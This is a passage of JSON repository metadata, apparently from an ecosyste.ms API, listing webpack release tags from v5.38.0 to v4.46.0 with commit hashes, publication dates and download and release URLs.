ack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webp